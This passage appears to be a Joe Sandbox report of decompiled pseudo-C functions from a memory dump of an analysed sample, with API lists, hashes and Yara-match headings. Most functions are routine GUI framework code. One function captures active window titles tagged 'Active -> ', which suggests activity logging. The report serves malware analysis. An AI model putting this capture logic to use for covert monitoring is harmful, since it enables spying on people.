                                                    0x00478548
                                                    0x00478587
                                                    0x0047858c
                                                    0x0047858e
                                                    0x00478594
                                                    0x004785a2
                                                    0x0047854a
                                                    0x00478559
                                                    0x00478563
                                                    0x00478569
                                                    0x00478575
                                                    0x00478575
                                                    0x004785a5
                                                    0x0047869d
                                                    0x0047869d
                                                    0x0047869d
                                                    0x0047869d
                                                    0x00000000
                                                    0x0047869d
                                                    0x0047851b
                                                    0x0047851e
                                                    0x00478527
                                                    0x00478527
                                                    0x004786a1
                                                    0x004786a1
                                                    0x004786a2
                                                    0x00000000
                                                    0x004784fd

                                                    APIs
                                                    • SysFreeString.OLEAUT32(?), ref: 00478782
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeString
                                                    • String ID: <~G$H
                                                    • API String ID: 3341692771-3576284788
                                                    • Opcode ID: ecd8712ba81d153100f6d8ed10ab1aa9da3ca18861188e6ea00d8c1b46d0990f
                                                    • Instruction ID: b8f1c08bed6d2714fac9d526e07dd471d665f945914cf58d975e5e29605529f8
                                                    • Opcode Fuzzy Hash: ecd8712ba81d153100f6d8ed10ab1aa9da3ca18861188e6ea00d8c1b46d0990f
                                                    • Instruction Fuzzy Hash: E7B1F8B4A006099FDB14CF99C884AAEB7F1FF49314F20C56AE909AB351D738AD41CF64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424E24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00424E24(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x424fad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(0x424fb4);
					return E004049E4( &_v80, 3);
				} else {
					_t76 =  *0x49e8e0; // 0x22f0a30
					E00424168(_t76);
					_push(_t137);
					_push(0x424f85);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E00404C24( &_v72, _v8 + 0x1b);
						if(E00408F88(_v72, "Default") != 0) {
							E00404C24( &_v80, _v8 + 0x1b);
							E0040A020( &(_v68.lfFaceName), _v80);
						} else {
							E00404C24( &_v76, "\rMS Sans Serif");
							E0040A020( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E00425108(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x424f8c);
					_t81 =  *0x49e8e0; // 0x22f0a30
					return E00424174(_t81);
				}
			}
















                                                    0x00424e25
                                                    0x00424e27
                                                    0x00424e2d
                                                    0x00424e30
                                                    0x00424e33
                                                    0x00424e36
                                                    0x00424e3a
                                                    0x00424e3b
                                                    0x00424e40
                                                    0x00424e43
                                                    0x00424e49
                                                    0x00424e53
                                                    0x00424f97
                                                    0x00424f9a
                                                    0x00424fac
                                                    0x00424e59
                                                    0x00424e59
                                                    0x00424e5e
                                                    0x00424e65
                                                    0x00424e66
                                                    0x00424e6b
                                                    0x00424e6e
                                                    0x00424e78
                                                    0x00424e84
                                                    0x00424e89
                                                    0x00424e8e
                                                    0x00424e93
                                                    0x00424e9d
                                                    0x00424ea8
                                                    0x00424e9f
                                                    0x00424e9f
                                                    0x00424e9f
                                                    0x00424eb9
                                                    0x00424ec6
                                                    0x00424ed3
                                                    0x00424edc
                                                    0x00424ee8
                                                    0x00424efc
                                                    0x00424f21
                                                    0x00424f2c
                                                    0x00424efe
                                                    0x00424f06
                                                    0x00424f11
                                                    0x00424f11
                                                    0x00424f31
                                                    0x00424f35
                                                    0x00424f39
                                                    0x00424f44
                                                    0x00424f46
                                                    0x00424f4e
                                                    0x00424f48
                                                    0x00424f4a
                                                    0x00424f54
                                                    0x00424f4c
                                                    0x00424f5a
                                                    0x00424f5a
                                                    0x00424f4a
                                                    0x00424f6a
                                                    0x00424f6a
                                                    0x00424f6f
                                                    0x00424f72
                                                    0x00424f75
                                                    0x00424f7a
                                                    0x00424f84
                                                    0x00424f84

                                                    APIs
                                                      • Part of subcall function 00424168: RtlEnterCriticalSection.KERNEL32(?,004241A5), ref: 0042416C
                                                    • CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateCriticalEnterFontIndirectSection
                                                    • String ID: MS Sans Serif$Default
                                                    • API String ID: 2931345757-2137701257
                                                    • Opcode ID: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                    • Instruction ID: b3d76d3ca7c544b37bc71fdcf573607e07253616adc25b4daf7a036753d91774
                                                    • Opcode Fuzzy Hash: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                    • Instruction Fuzzy Hash: 16517F31B04258DFDB01DFA4D641B8DBBF6EF88304FA640AAE804A7352D3389E05DB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044E02C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E0044E02C(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x49ebac; // 0x22f0da8
					E0042C30C(_t34,  &_v24);
					_push(_t69);
					_push(0x44e12a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E0044DD30(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x44e131);
							_t40 =  *0x49ebac; // 0x22f0da8
							return E0042C304(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x49ebac; // 0x22f0da8
					E0042C30C(_t42,  &_v8);
					_push(_t69);
					_push(0x44e0ff);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E0044DED8( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x44e106);
					_t48 =  *0x49ebac; // 0x22f0da8
					return E0042C304(_t48);
				}
				L14:
			}


















                                                    0x0044e02d
                                                    0x0044e02f
                                                    0x0044e033
                                                    0x0044e035
                                                    0x0044e03f
                                                    0x0044e048
                                                    0x0044e147
                                                    0x0044e04e
                                                    0x0044e058
                                                    0x0044e05a
                                                    0x0044e05a
                                                    0x0044e06a
                                                    0x0044e06c
                                                    0x0044e06c
                                                    0x0044e076
                                                    0x0044e078
                                                    0x0044e078
                                                    0x0044e084
                                                    0x0044e08a
                                                    0x0044e08f
                                                    0x0044e096
                                                    0x0044e097
                                                    0x0044e09c
                                                    0x0044e09f
                                                    0x0044e0a2
                                                    0x0044e0a2
                                                    0x0044e0b4
                                                    0x0044e0bb
                                                    0x00000000
                                                    0x00000000
                                                    0x0044e10a
                                                    0x0044e114
                                                    0x0044e117
                                                    0x0044e11a
                                                    0x0044e11f
                                                    0x0044e129
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044e10a
                                                    0x0044e0c0
                                                    0x0044e0c5
                                                    0x0044e0cc
                                                    0x0044e0cd
                                                    0x0044e0d2
                                                    0x0044e0d5
                                                    0x0044e0e4
                                                    0x0044e0e9
                                                    0x0044e0ec
                                                    0x0044e0ef
                                                    0x0044e0f4
                                                    0x0044e0fe
                                                    0x0044e0fe
                                                    0x00000000

                                                    APIs
                                                    • GetKeyState.USER32(00000010), ref: 0044E050
                                                    • GetKeyState.USER32(00000011), ref: 0044E062
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: State
                                                    • String ID:
                                                    • API String ID: 1649606143-3916222277
                                                    • Opcode ID: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                    • Instruction ID: dd991a499b8bdb83682dc26b7e7e078d12a516ef0c40e0bf5f2210f7bad781b1
                                                    • Opcode Fuzzy Hash: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                    • Instruction Fuzzy Hash: D231F731A04218AFEB11DFA6E84179EB7F5FB48314F50C4BBEC00A6291E77C5A00D668
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045AE50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81threadwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E0045AE50(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t52;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __esi;
				_t71 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x45af60);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t56 = E0045ADD8(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t52 = _v8;
					_t79 =  *((intOrPtr*)(_t52 + 0x48));
					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
						E0045B3A8(_v8);
					}
				}
				E00458DF8(_t56,  &_v20);
				E004380E0(_v20, 0,  &_v16, _t79);
				_t36 =  *0x49ebb8; // 0x0
				E0045B010(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x45af07);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0x102)) != 0) {
					_t56 = _v8;
					 *((intOrPtr*)(_v8 + 0x100))();
				}
				if(_v9 != 0) {
					E0045AD74();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x49de40; // 0x49e034
				if(_t41 ==  *_t67 && E004214B8(0, _t56, _t71, _t72) != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E0045AF67);
				return E004049E4( &_v20, 2);
			}
















                                                    0x0045ae50
                                                    0x0045ae50
                                                    0x0045ae51
                                                    0x0045ae53
                                                    0x0045ae56
                                                    0x0045ae57
                                                    0x0045ae58
                                                    0x0045ae5b
                                                    0x0045ae5e
                                                    0x0045ae61
                                                    0x0045ae66
                                                    0x0045ae67
                                                    0x0045ae6c
                                                    0x0045ae6f
                                                    0x0045ae7a
                                                    0x0045ae86
                                                    0x0045ae88
                                                    0x0045ae8b
                                                    0x0045ae8f
                                                    0x0045ae94
                                                    0x0045ae94
                                                    0x0045ae8f
                                                    0x0045ae9e
                                                    0x0045aea9
                                                    0x0045aeb1
                                                    0x0045aeb6
                                                    0x0045aebb
                                                    0x0045aec1
                                                    0x0045aec2
                                                    0x0045aec7
                                                    0x0045aeca
                                                    0x0045aed8
                                                    0x0045aedd
                                                    0x0045aee9
                                                    0x0045aee9
                                                    0x0045aef3
                                                    0x0045aef8
                                                    0x0045aef8
                                                    0x0045aeff
                                                    0x0045af02
                                                    0x0045af1c
                                                    0x0045af21
                                                    0x0045af29
                                                    0x0045af36
                                                    0x0045af36
                                                    0x0045af3e
                                                    0x0045af40
                                                    0x0045af40
                                                    0x0045af47
                                                    0x0045af4a
                                                    0x0045af4d
                                                    0x0045af5f

                                                    APIs
                                                      • Part of subcall function 0045ADD8: GetCursorPos.USER32 ref: 0045ADE1
                                                    • GetCurrentThreadId.KERNEL32 ref: 0045AF1C
                                                    • WaitMessage.USER32(00000000,0045AF60,?,?,?,0049ABD1), ref: 0045AF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentCursorMessageThreadWait
                                                    • String ID: 4I
                                                    • API String ID: 535285469-2364942553
                                                    • Opcode ID: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                    • Instruction ID: 3d320c2a842818ba80bdb21166925b08477e9e3b0af4457c4c140f173818ef6e
                                                    • Opcode Fuzzy Hash: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                    • Instruction Fuzzy Hash: F431D670A04208EFDB01DF65C846BAEB7F5EB05305F6145BAEC00A7392D7796E58C71A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A3E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E0042A3E8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00403BBC(1);
				_push(_t77);
				_push(0x42a46f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x418ef8; // 0x418f44
				 *((intOrPtr*)(_v12 + 0x6c)) = E00403D9C(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x49e8b0);
				L00406FE0();
				_push(_t77);
				_push(0x42a4cf);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00428E70( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00428E6C(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x42a4d6);
				_push(0x49e8b0);
				L004071A0();
				return 0;
			}












                                                    0x0042a3e9
                                                    0x0042a3eb
                                                    0x0042a3f5
                                                    0x0042a404
                                                    0x0042a409
                                                    0x0042a40a
                                                    0x0042a40f
                                                    0x0042a412
                                                    0x0042a418
                                                    0x0042a41e
                                                    0x0042a431
                                                    0x0042a431
                                                    0x0042a439
                                                    0x0042a443
                                                    0x0042a44e
                                                    0x0042a44e
                                                    0x0042a454
                                                    0x0042a462
                                                    0x0042a467
                                                    0x0042a46a
                                                    0x0042a486
                                                    0x0042a48b
                                                    0x0042a492
                                                    0x0042a493
                                                    0x0042a498
                                                    0x0042a49b
                                                    0x0042a4a4
                                                    0x0042a4af
                                                    0x0042a4b2
                                                    0x0042a4b9
                                                    0x0042a4bc
                                                    0x0042a4bf
                                                    0x0042a4c4
                                                    0x0042a4c9
                                                    0x0042a4ce

                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(0049E8B0), ref: 0042A48B
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E8B0,0042A4D6,0049E8B0), ref: 0042A4C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave
                                                    • String ID: P>B
                                                    • API String ID: 3168844106-1256901731
                                                    • Opcode ID: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                    • Instruction ID: 63024a2a2f57267be46c6b4524dac06f3360d3f79ec1ca4db72fa5e9cc5c2d4b
                                                    • Opcode Fuzzy Hash: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                    • Instruction Fuzzy Hash: 77218E74B04314EFD701DF69D88188DBBF5FB48720B5281AAE844A7791D778EE90CA98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004769AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 51%
                                                    			E004769AC(void* __ebx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				int _t28;
				intOrPtr _t32;
				void* _t37;
				intOrPtr* _t45;
				struct HWND__* _t48;
				intOrPtr _t55;
				intOrPtr _t67;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t67);
				_push(0x476a7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67;
				_t48 =  *(__edx + 4);
				if(_t48 > 0) {
					E0040500C( &_v8, GetWindowTextLengthA(_t48));
					_t28 = E00404C80(_v8) + 1;
					GetWindowTextA(_t48, E00404E80(_v8), _t28);
					_t32 =  *0x49ec6c; // 0x0
					E00408FF8(_t32,  &_v12);
					_push(_v12);
					E00408FF8(_v8,  &_v16);
					_pop(_t37);
					E00404DCC(_t37, _v16);
					if(_t28 != 0) {
						E00408FF8(_v8,  &_v20);
						if(_v20 != 0) {
							E00404A14(0x49ec6c, _v8);
							E00404CCC( &_v24, _v8, "Active -> ");
							_t45 =  *0x49ec44; // 0x0
							 *0x49ec48 =  *((intOrPtr*)( *_t45 + 0x38))();
						}
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(0x476a82);
				return E004049E4( &_v24, 5);
			}















                                                    0x004769b1
                                                    0x004769b2
                                                    0x004769b3
                                                    0x004769b4
                                                    0x004769b5
                                                    0x004769b9
                                                    0x004769ba
                                                    0x004769bf
                                                    0x004769c2
                                                    0x004769c5
                                                    0x004769ca
                                                    0x004769db
                                                    0x004769e8
                                                    0x004769f4
                                                    0x004769fc
                                                    0x00476a01
                                                    0x00476a09
                                                    0x00476a10
                                                    0x00476a18
                                                    0x00476a19
                                                    0x00476a1e
                                                    0x00476a26
                                                    0x00476a2f
                                                    0x00476a39
                                                    0x00476a49
                                                    0x00476a51
                                                    0x00476a5b
                                                    0x00476a5b
                                                    0x00476a2f
                                                    0x00476a1e
                                                    0x00476a62
                                                    0x00476a65
                                                    0x00476a68
                                                    0x00476a7a

                                                    APIs
                                                    • GetWindowTextLengthA.USER32(?), ref: 004769D1
                                                    • GetWindowTextA.USER32 ref: 004769F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: TextWindow$Length
                                                    • String ID: Active ->
                                                    • API String ID: 1006428111-2811066380
                                                    • Opcode ID: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                    • Instruction ID: d9f40d637c3a14713fae2ad8e053e9984e8428a736acad8caa5444ef25058333
                                                    • Opcode Fuzzy Hash: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                    • Instruction Fuzzy Hash: 7C215774600209DFD704EBA5C9829AFB3B9EF45704B61857BF505B3351DB78AE00CA68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043B290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E0043B290(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t31;
				void* _t36;
				intOrPtr _t42;
				struct HDC__* _t47;
				void* _t50;

				_push(__esi);
				_v16 = 0;
				_t36 = __eax;
				_push(_t50);
				_push(0x43b326);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if( *((intOrPtr*)(__eax + 0x30)) == 0) {
					_v12 =  *((intOrPtr*)(__eax + 8));
					_v8 = 0xb;
					_t31 =  *0x49dc4c; // 0x422f30
					E00406A70(_t31,  &_v16);
					E0040D180(_t36, _v16, 1, __edi, __esi, 0,  &_v12);
					E00404378();
				}
				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
				SetViewportOrgEx(_t47,  *(_t36 + 0x40),  *(_t36 + 0x44), 0);
				IntersectClipRect(_t47, 0, 0,  *(_t36 + 0x48),  *(_t36 + 0x4c));
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x43b32d);
				return E004049C0( &_v16);
			}











                                                    0x0043b297
                                                    0x0043b29a
                                                    0x0043b29d
                                                    0x0043b2a1
                                                    0x0043b2a2
                                                    0x0043b2a7
                                                    0x0043b2aa
                                                    0x0043b2b1
                                                    0x0043b2b6
                                                    0x0043b2b9
                                                    0x0043b2c6
                                                    0x0043b2cb
                                                    0x0043b2da
                                                    0x0043b2df
                                                    0x0043b2df
                                                    0x0043b2ec
                                                    0x0043b2f9
                                                    0x0043b30b
                                                    0x0043b312
                                                    0x0043b315
                                                    0x0043b318
                                                    0x0043b325

                                                    APIs
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043B2F9
                                                    • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043B30B
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClipIntersectLoadRectStringViewport
                                                    • String ID: 0/B
                                                    • API String ID: 2734429277-1373906003
                                                    • Opcode ID: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                    • Instruction ID: e8a904d80b5f428ce4efa45f7181a255eb87ff5514a318c6dca8c784068d0644
                                                    • Opcode Fuzzy Hash: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                    • Instruction Fuzzy Hash: 25112E71A04204AFDB04DF99DC91FAE77A8EB49304F5040BAFE00EB291DB75AD00CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043B338 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0043B338(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E0041ACC8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E0041AC6C(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0043A91C(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                                    0x0043b341
                                                    0x0043b34e
                                                    0x0043b361
                                                    0x0043b365
                                                    0x0043b3b5
                                                    0x0043b3b5
                                                    0x0043b367
                                                    0x0043b367
                                                    0x0043b367
                                                    0x0043b371
                                                    0x0043b377
                                                    0x00000000
